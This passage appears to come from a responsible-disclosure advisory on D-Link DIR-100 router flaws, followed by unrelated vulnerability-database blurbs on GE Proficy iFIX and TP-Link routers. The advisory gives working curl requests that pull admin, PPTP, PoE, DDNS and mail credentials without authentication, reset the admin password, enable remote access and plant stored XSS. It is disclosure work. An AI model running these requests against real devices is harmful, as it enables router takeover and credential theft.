each cgi-script can be retrieved by: curl 'http://192.168.1.104/cliget.cgi?cmd=help' # and respectively when authenticated curl 'http://192.168.1.104/cli.cgi?cmd=help' ## 3.1 Authentication Bypass ### Description The administrator password is not protected in any way on the device, every attacker with access to the administrator interface which listens on port 80. For retrieving the Administrator password the request must not be authenticated. ### Proof of Concept The web interface provides two distinct ways to retrieve the adminstrator password: curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1' curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary' ## 3.2 Weak Authentication ### Description As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used by without authenticating before as the cgi-script does not check any other authentication parameters such as cookies or HTTP Parameters. The only access check is if the IP-Address is the same. ### Proof of Concept # open the router interface in a web browser and log in firefox 'http://192.168.0.1/' # open a new terminal or another web-browser which is currently not logged # in and try to access curl 'http://192.168.0.1/cli.cgi?cmd=help' # this request will be authenticated and it will not be redirected to the # login page. If no user is logged in, the request will be redirected to # the login ## 3.3 Retrieve sensitive information ### Description Besides retrieving the administrator password without authentication it is possible to retrieve other sensitive configuration from the device as well like the PPTP and poe Username and Password, as well as the configured dyndns username and password and configured mail log credentials when these parameters are configured. No authentication is requred. ### Proof of Concept curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user' curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd' ## 3.4 Cross-Site Request Forgery (CSRF) ### Description CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example the attacker could change the administrator password (see Proof of Concept code) and enable system remote access. ### Proof of Concept Changing the password for administrator can be done when the ip-address is authenticated: # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # Change password curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit' # enable remote console curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit' ## 3.5 Cross-Site Scripting (XSS) ### Description It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters which results in persistent Cross-Site Scripting Vulnerabilities. With this vulnerabilty the victim (administrator) will run javascript code in the context of the D-Link DIR-100. XSS is possible because only on the client side (javascript code) the input is filtered and validated, sending data directly to the CGI scripts. ### Proof of Concept # Log into DIR-100 curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm' # XSS in Static IP Address Tab curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp=' # XSS in Scheduler tab curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit' # 4 Severity and Remediation This exploits are considered very critical, especially when the feature of remote administration is activated on the system. Weak authentication, together with cross-site request forgery and authentication bypass can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet-port. It is recommended to upgrade the router with the newest firmware of the D-Link DIR-100. # 5 Timeline 2013-09-13 - First Contact with D-Link Support 2013-09-19 - Sent Report 2013-10-14 - Request Status update, Response: Beta will be available mid October 2013-12-02 - Vendor publishes Firmware Update 2013-12-11 - Request CVE-IDs 2013-12-18 - Publish the report

GE Intelligent Platforms Proficy HMI/SCADA\342\200\223iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 4.5, 5.0, 5.1 has a remote buffer overflow vulnerability in the implementation of the TCP/IP task process (TCPTASK.exe). Successful exploitation allows an attacker to execute arbitrary code in the context of the affected application

GE Intelligent Platforms Proficy HMI/SCADA\342\200\223iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 7.19i and 7.44a have an unsafe default password vulnerability in their implementation. A remote attacker can exploit this vulnerability to gain unauthorized access to a device if they know the default certificate set during the installation process

GE Intelligent Platforms Proficy HMI/SCADA\342\200\223iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 5.0, 5.1, 5.5 has a remote buffer overflow vulnerability in the implementation of the TCP/IP task process (TCPTASK.exe). A remote attacker exploits this vulnerability by sending a specially crafted TCP/IP message, which can result in a denial of service after successful exploitation

The TP-Link TL-WR740N/TL-WR740ND Wireless N router HTTP service failed to properly handle user-submitted requests, allowing remote attackers to exploit exploits to send specially crafted requests to crash the server, causing a denial of service attack. TP-LINK TL-WR740N and TL-WR740ND are wireless router products of China TP-LINK company. A denial of service vulnerability exists in TP-LINK TL-WR740N / TL-WR740ND using 3.12.11 Build 120320 Rel.51047n firmware. An attacker could use this vulnerability to crash an affected device and cause a denial of service. TP-Link TL-WR740N/TL-WR740ND are prone to a denial-of-service vulnerability